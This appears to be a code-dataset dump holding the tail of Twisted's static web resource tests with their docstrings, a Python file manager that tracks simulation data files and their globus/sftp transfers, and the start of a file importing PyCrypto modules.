Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request(b'')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
L{static.formatFileSize} formats an amount of bytes into a more readable
format.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, L{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
if getattr(inspect, "signature", None):
signature = inspect.signature(static.loadMimeTypes)
self.assertIs(signature.parameters["init"].default,
mimetypes.init)
else:
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIs(defaultInit, mimetypes.init)
class StaticDeprecationTests(TestCase):
def test_addSlashDeprecated(self):
"""
L{twisted.web.static.addSlash} is deprecated.
"""
from twisted.web.static import addSlash
addSlash(DummyRequest([b'']))
warnings = self.flushWarnings([self.test_addSlashDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(warnings[0]['message'],
"twisted.web.static.addSlash was deprecated in Twisted 16.0.0")
| src/twisted/web/test/test_static.py | 67,812 | Tests for L{static.DirectoryLister}.
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
Tests for L{MultipleRangeStaticProducer}.
Tests for L{NoRangeStaticProducer}.
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
Tests for L{SingleRangeStaticProducer}.
Tests for L{Data}.
Tests for the basic behavior of L{File}.
Tests for L{File.makeProducer}.
Tests for the abstract L{StaticProducer}.
Asserts that a given log message occurred with an expected message.
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this will fail the calling test on certain syntactic
problems.
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
Clean up the resource file and the log observer.
A HEAD request opens the file, gets the size, and then closes it after
the request.
L{twisted.web.static.addSlash} is deprecated.
Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
A correct response to a range request is as long as the length of the
requested range.
If a file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
A GET request that is cached closes the file after the request.
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
By default, L{None} is passed to C{mimetypes.init}.
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
L{static.DirectoryLister} escape "&", "<" and ">" after unquoting the
request uri.
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
Passed MIME type files are passed to C{mimetypes.init}.
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
L{static.formatFileSize} format an amount of bytes into a more readable
format.
The resource rendered for child not found requests can be customize
using a class member.
L{Data.render} returns an empty response body for a I{HEAD} request.
L{static.File.render} returns an empty response body for I{HEAD}
requests.
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
L{NoRangeStaticProducer} implements L{IPullProducer}.
L{SingleRangeStaticProducer} implements L{IPullProducer}.
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
The response to a request for multiple bytes ranges is a MIME-ish
multipart response.
The response to a request for multiple bytes ranges is a MIME-ish
multipart response, even when one of the ranges falls off the end of
the resource.
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
If multiple byte ranges are specified their starts and stops are
returned.
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
makeProducer when no Range header is set sets the Content-* headers
for the response.
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
L{static.DirectoryLister} gives an alternate class for each odd and
even rows in the table.
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
L{static.DirectoryLister} is able to list all the directories inside
a directory.
L{static.DirectoryLister} is able to list all the files inside a
directory.
L{static.DirectoryLister} takes an optional C{dirs} argument that
filter out the list of directories and files printed.
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
L{static.DirectoryLister} unquote the request uri before printing it.
L{static.DirectoryLister.__repr__} gives the path of the lister.
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
A request for a existing unicode file path encoded as UTF-8
returns the contents of that file.
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
By default, C{mimetypes.init} is called.
Tests for L{twisted.web.static}.
Copyright (c) Twisted Matrix Laboratories. See LICENSE for details. Make sure we can delete the file later. Get rid of our own read permission. Open our file instead of a real one This request will always return saying that it is cached The only content-* headers set are content-type and content-length. The content-length depends on the boundary used in the response. Content-type should be set to a value indicating a multipart response and the boundary used to separate the parts. Content-encoding is not set in the response to a multiple range response, which is a bit wussy but works well enough with the way static.File does content-encodings... start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. DummyRequest.registerProducer pulls all output from the producer, so we just need to call start. start calls registerProducer on the DummyRequest, which pulls all output from the producer and so we just need this one call. This is just a jumble of random stuff. It's supposed to be a good set of data for this test, particularly in order to avoid accidentally seeing the right result by having a byte sequence repeated at different locations or by having byte values which are somehow correlated with their position in the string. there's no = unknown isn't a valid Bytes-Unit there's no - in =stuff both start and end are empty start isn't an integer end isn't an integer end isn't equal to or greater than start Sections 10.4.17 and 14.16 Checking mimetypes.inited doesn't always work, because something, somewhere, calls mimetypes.init. Yay global mutable state :) | 15,817 | en | 0.861238 |
import os
import re
import sys
import threading
import logging
import random
from time import sleep
from peewee import *
from enum import IntEnum
from threading import Thread
from models import DataFile
from lib.jobstatus import JobStatus
from lib.util import print_debug
from lib.util import print_line
from lib.util import print_message
class FileStatus(IntEnum):
PRESENT = 0
NOT_PRESENT = 1
IN_TRANSIT = 2
class FileManager(object):
"""
Manage all files required by jobs
"""
def __init__(self, event_list, config, database='processflow.db'):
"""
Parameters:
database (str): the path to where to create the sqlite database file
config (dict): the global configuration dict
"""
self._event_list = event_list
self._db_path = database
self._config = config
if os.path.exists(database):
os.remove(database)
DataFile._meta.database.init(database)
if DataFile.table_exists():
DataFile.drop_table()
DataFile.create_table()
self.thread_list = list()
self.kill_event = threading.Event()
def __str__(self):
# TODO: make this better
return str({
'db_path': self._db_path,
})
def get_endpoints(self):
"""
Return a list of globus endpoints for all cases
"""
q = (DataFile
.select()
.where(
DataFile.transfer_type == 'globus'))
endpoints = list()
for x in q.execute():
if x.remote_uuid not in endpoints:
endpoints.append(x.remote_uuid)
return endpoints
def write_database(self):
"""
Write out a human readable version of the database for debug purposes
"""
file_list_path = os.path.join(
self._config['global']['project_path'],
'output',
'file_list.txt')
with open(file_list_path, 'w') as fp:
try:
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
fp.write('+++++++++++++++++++++++++++++++++++++++++++++')
fp.write('\n\t{case}\t\n'.format(case=case))
fp.write('+++++++++++++++++++++++++++++++++++++++++++++\n')
q = (DataFile
.select(DataFile.datatype)
.where(DataFile.case == case)
.distinct())
for df_type in q.execute():
_type = df_type.datatype
fp.write('===================================\n')
fp.write('\t' + _type + ':\n')
datafiles = (DataFile
.select()
.where(
(DataFile.datatype == _type) &
(DataFile.case == case)))
for datafile in datafiles.execute():
filestr = '-------------------------------------'
filestr += '\n\t name: ' + datafile.name + '\n\t local_status: '
if datafile.local_status == 0:
filestr += ' present, '
elif datafile.local_status == 1:
filestr += ' missing, '
else:
filestr += ' in transit, '
filestr += '\n\t remote_status: '
if datafile.remote_status == 0:
filestr += ' present'
elif datafile.remote_status == 1:
filestr += ' missing'
else:
filestr += ' in transit'
filestr += '\n\t local_size: ' + \
str(datafile.local_size)
filestr += '\n\t local_path: ' + datafile.local_path
filestr += '\n\t remote_path: ' + datafile.remote_path
filestr += '\n\t year: ' + str(datafile.year)
filestr += '\n\t month: ' + str(datafile.month) + '\n'
fp.write(filestr)
except Exception as e:
print_debug(e)
def check_data_ready(self, data_required, case, start_year=None, end_year=None):
try:
for datatype in data_required:
if start_year and end_year:
q = (DataFile
.select()
.where(
(DataFile.year >= start_year) &
(DataFile.year <= end_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype)))
else:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
datafiles = q.execute()
for df in datafiles:
if not os.path.exists(df.local_path) and df.local_status == FileStatus.PRESENT.value:
df.local_status = FileStatus.NOT_PRESENT.value
df.save()
elif os.path.exists(df.local_path) and df.local_status == FileStatus.NOT_PRESENT.value:
df.local_status = FileStatus.PRESENT.value
df.save()
if df.local_status != FileStatus.PRESENT.value:
return False
return True
except Exception as e:
print_debug(e)
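# Hedged usage sketch (the case name and data type below are illustrative
# assumptions, not values taken from a real processflow config):
# if not file_manager.check_data_ready(['atm'], 'case01', start_year=1, end_year=5):
#     # defer the job until update_local_status()/transfer_needed() bring the files in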
def render_file_string(self, data_type, data_type_option, case, year=None, month=None):
"""
Takes strings from the data_types dict and replaces the keywords with the appropriate values
"""
# setup the replacement dict
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
replace = {
'PROJECT_PATH': self._config['global']['project_path'],
'REMOTE_PATH': self._config['simulations'][case].get('remote_path', ''),
'CASEID': case,
'REST_YR': '{:04d}'.format(start_year + 1),
'START_YR': '{:04d}'.format(start_year),
'END_YR': '{:04d}'.format(end_year),
'LOCAL_PATH': self._config['simulations'][case].get('local_path', '')
}
if year is not None:
replace['YEAR'] = '{:04d}'.format(year)
if month is not None:
replace['MONTH'] = '{:02d}'.format(month)
if self._config['data_types'][data_type].get(case):
if self._config['data_types'][data_type][case].get(data_type_option):
instring = self._config['data_types'][data_type][case][data_type_option]
for item in self._config['simulations'][case]:
if item.upper() in self._config['data_types'][data_type][case][data_type_option]:
instring = instring.replace(item.upper(), self._config['simulations'][case][item])
return instring
instring = self._config['data_types'][data_type][data_type_option]
for string, val in replace.items():
if string in instring:
instring = instring.replace(string, val)
return instring
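# Illustrative sketch of the substitution above, assuming no case-specific
# override and a made-up file_format entry such as
#   config['data_types']['atm']['file_format'] = 'CASEID.cam.h0.YEAR-MONTH.nc'
# then render_file_string('atm', 'file_format', case='case01', year=5, month=2)
# would return 'case01.cam.h0.0005-02.nc' once CASEID, YEAR and MONTH are replaced.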
def populate_file_list(self):
"""
Populate the database with the required DataFile entries
"""
msg = 'Creating file table'
print_line(
line=msg,
event_list=self._event_list)
newfiles = list()
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
with DataFile._meta.database.atomic():
# for each case
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
# for each data type
for _type in self._config['data_types']:
data_types_for_case = self._config['simulations'][case]['data_types']
if 'all' not in data_types_for_case:
if _type not in data_types_for_case:
continue
# setup the base local_path
local_path = self.render_file_string(
data_type=_type,
data_type_option='local_path',
case=case)
new_files = list()
if self._config['data_types'][_type].get('monthly') and self._config['data_types'][_type]['monthly'] in ['True', 'true', '1', 1]:
# handle monthly data
for year in range(start_year, end_year + 1):
for month in range(1, 13):
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case,
year=year,
month=month)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case,
year=year,
month=month)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': year,
'month': month,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
else:
# handle one-off data
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': 0,
'month': 0,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
tail, _ = os.path.split(new_files[0]['local_path'])
if not os.path.exists(tail):
os.makedirs(tail)
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
msg = 'Database update complete'
print_line(msg, self._event_list)
def verify_remote_files(self, client, case):
"""
Check that the user supplied file paths are valid for remote files
Parameters:
client: either an ssh_client or a globus_client
case: the case to check remote paths for
"""
if not self._config['global']['verify']:
return True
msg = 'verifying remote file paths'
print_line(msg, self._event_list)
data_types_to_verify = []
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status != FileStatus.PRESENT.value)))
for datafile in q.execute():
if datafile.datatype not in data_types_to_verify:
data_types_to_verify.append(datafile.datatype)
found_all = True
for datatype in data_types_to_verify:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
files = q.execute()
remote_path, _ = os.path.split(files[0].remote_path)
msg = 'Checking {} files in {}'.format(datatype, remote_path)
print_line(msg, self._event_list)
if files[0].transfer_type == 'globus':
from lib.globus_interface import get_ls as globus_ls
remote_contents = globus_ls(
client=client,
path=remote_path,
endpoint=self._config['simulations'][case]['remote_uuid'])
elif files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ls as ssh_ls
remote_contents = ssh_ls(
client=client,
remote_path=remote_path)
remote_names = [x['name'] for x in remote_contents]
for df in files:
if df.name not in remote_names:
msg = 'Unable to find file {name} at {remote_path}'.format(
name=df.name,
remote_path=remote_path)
print_message(msg, 'error')
found_all = False
if not found_all:
return False
else:
msg = 'found all remote files for {}'.format(case)
print_message(msg, 'ok')
return True
def terminate_transfers(self):
self.kill_event.set()
for thread in self.thread_list:
msg = 'terminating {}, this may take a moment'.format(thread.name)
print_line(msg, self._event_list)
thread.join()
def print_db(self):
for df in DataFile.select():
print({
'case': df.case,
'type': df.datatype,
'name': df.name,
'local_path': df.local_path,
'remote_path': df.remote_path,
'transfer_type': df.transfer_type,
})
def add_files(self, data_type, file_list):
"""
Add files to the database
Parameters:
data_type (str): the data_type of the new files
file_list (list): a list of dictionaries in the format
local_path (str): path to the file,
case (str): the case these files belong to
name (str): the filename
remote_path (str): the remote path of these files, optional
transfer_type (str): the transfer type of these files, optional
year (int): the year of the file, optional
month (int): the month of the file, optional
remote_uuid (str): remote globus endpoint id, optional
remote_hostname (str): remote hostname for sftp transfer, optional
"""
try:
new_files = list()
for file in file_list:
new_files.append({
'name': file['name'],
'local_path': file['local_path'],
'local_status': file.get('local_status', FileStatus.NOT_PRESENT.value),
'datatype': data_type,
'case': file['case'],
'year': file.get('year', 0),
'month': file.get('month', 0),
'remote_uuid': file.get('remote_uuid', ''),
'remote_hostname': file.get('remote_hostname', ''),
'remote_path': file.get('remote_path', ''),
'remote_status': FileStatus.NOT_PRESENT.value,
'local_size': 0,
'transfer_type': file.get('transfer_type', 'local')
})
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
except Exception as e:
print_debug(e)
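# Hedged usage sketch (the data type, file name and paths are made up for
# illustration; any field left out falls back to the defaults set above):
# file_manager.add_files('climo_regrid', [
#     {'name': 'case01_ANN_climo.nc',
#      'local_path': '/project/output/pp/case01_ANN_climo.nc',
#      'case': 'case01',
#      'year': 5}])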
def update_local_status(self):
"""
Update the database with the local status of the expected files
Return True if new local data was found, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
printed = False
change = False
for datafile in query.execute():
marked = False
if os.path.exists(datafile.local_path):
if datafile.local_status == FileStatus.NOT_PRESENT.value or datafile.local_status == FileStatus.IN_TRANSIT.value:
datafile.local_status = FileStatus.PRESENT.value
marked = True
change = True
else:
if datafile.transfer_type == 'local':
msg = '{case} transfer_type is local, but {filename} is not present'.format(
case=datafile.case, filename=datafile.name)
logging.error(msg)
if not printed:
print_line(msg, self._event_list)
printed = True
if datafile.local_status == FileStatus.PRESENT.value:
datafile.local_status = FileStatus.NOT_PRESENT.value
marked = True
if marked:
datafile.save()
except Exception as e:
print_debug(e)
return change
def all_data_local(self):
"""
Returns True if all data is local, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
missing_data = query.execute()
# if any of the data is missing, not all data is local
if missing_data:
logging.debug('All data is not local, missing the following')
logging.debug([x.name for x in missing_data])
return False
except Exception as e:
print_debug(e)
logging.debug('All data is local')
return True
def transfer_needed(self, event_list, event, config):
"""
Start a transfer job for any files that aren't local but do exist remotely
Globus user must already be logged in
"""
# required files don't exist locally but do exist remotely,
# or they exist locally with a different local and remote size
target_files = list()
try:
q = (DataFile
.select(DataFile.case)
.where(
DataFile.local_status == FileStatus.NOT_PRESENT.value))
caselist = [x.case for x in q.execute()]
if not caselist or len(caselist) == 0:
return
cases = list()
for case in caselist:
if case not in cases:
cases.append(case)
for case in cases:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status == FileStatus.NOT_PRESENT.value)))
required_files = [x for x in q.execute()]
# removing items from a list while iterating over it skips entries, so filter instead
required_files = [x for x in required_files if x.transfer_type != 'local']
if not required_files:
msg = 'ERROR: all missing files are marked as local'
print_line(msg, event_list)
return
# mark files as in-transit so we don't double-copy
# can't do a single bulk update since there may be too many records for the db to handle
step = 50
for idx in range(0, len(required_files), step):
q = (DataFile
.update({DataFile.local_status: FileStatus.IN_TRANSIT})
.where(DataFile.name << [x.name for x in required_files[idx: step + idx]]))
q.execute()
for file in required_files:
target_files.append({
'local_path': file.local_path,
'remote_path': file.remote_path,
})
if required_files[0].transfer_type == 'globus':
from lib.globus_interface import transfer as globus_transfer
from globus_cli.services.transfer import get_client as get_globus_client
msg = 'Starting globus file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
msg = 'See https://www.globus.org/app/activity for transfer details'
print_line(msg, event_list)
client = get_globus_client()
if not self.verify_remote_files(client=client, case=case):
return False
remote_uuid = required_files[0].remote_uuid
local_uuid = self._config['global']['local_globus_uuid']
thread_name = '{}_globus_transfer'.format(required_files[0].case)
_args = (client, remote_uuid,
local_uuid, target_files,
self.kill_event)
thread = Thread(
target=globus_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
elif required_files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ssh_client
msg = 'Starting sftp file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
client = get_ssh_client(required_files[0].remote_hostname)
if not self.verify_remote_files(client=client, case=case):
return False
thread_name = '{}_sftp_transfer'.format(required_files[0].case)
_args = (target_files, client, self.kill_event)
thread = Thread(
target=self._ssh_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
except Exception as e:
print_debug(e)
return False
def _ssh_transfer(self, target_files, client, event):
from lib.ssh_interface import transfer as ssh_transfer
sftp_client = client.open_sftp()
for file in target_files:
if event.is_set():
return
_, filename = os.path.split(file['local_path'])
msg = 'sftp transfer from {} to {}'.format(
file['remote_path'], file['local_path'])
logging.info(msg)
msg = 'starting sftp transfer for {}'.format(filename)
print_line(msg, self._event_list)
ssh_transfer(sftp_client, file)
msg = 'sftp transfer complete for {}'.format(filename)
print_line(msg, self._event_list)
msg = self.report_files_local()
print_line(msg, self._event_list)
def report_files_local(self):
"""
Return a string in the format 'X/Y files available locally', where X is the number of files present locally and Y is the total
"""
q = (DataFile
.select(DataFile.local_status)
.where(DataFile.local_status == FileStatus.PRESENT.value))
local = len([x.local_status for x in q.execute()])
q = (DataFile.select(DataFile.local_status))
total = len([x.local_status for x in q.execute()])
msg = '{local}/{total} files available locally or {prec:.2f}%'.format(
local=local, total=total, prec=((local*1.0)/total)*100)
return msg
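# Example of the string built above: with 38 of 50 expected files present this
# returns '38/50 files available locally or 76.00%'.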
def get_file_paths_by_year(self, datatype, case, start_year=None, end_year=None):
"""
Return paths to files that match the given type, start, and end year
Parameters:
datatype (str): the type of data
case (str): the name of the case to return files for
start_year (int): the first year to return data for
end_year (int): the last year to return data for
"""
try:
if start_year and end_year:
if datatype in ['climo_regrid', 'climo_native', 'ts_regrid', 'ts_native']:
query = (DataFile
.select()
.where(
(DataFile.month == end_year) &
(DataFile.year == start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.year <= end_year) &
(DataFile.year >= start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
datafiles = query.execute()
if datafiles is None or len(datafiles) == 0:
return None
return [x.local_path for x in datafiles]
except Exception as e:
print_debug(e)
| lib/filemanager.py | 28,848 | TODO: make this better setup the replacement dict for each case for each data type setup the base local_path handle monthly data handle one-off data if any of the data is missing, not all data is local required files dont exist locally, do exist remotely or if they do exist locally have a different local and remote size mark files as in-transit so we dont double-copy cant do a bulk update since there may be to many records for the db to handle | 447 | en | 0.850178 |
import os
import base64
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Hash import MD5
from Crypto.Hash import SHA
from Crypto.Hash import SHA256
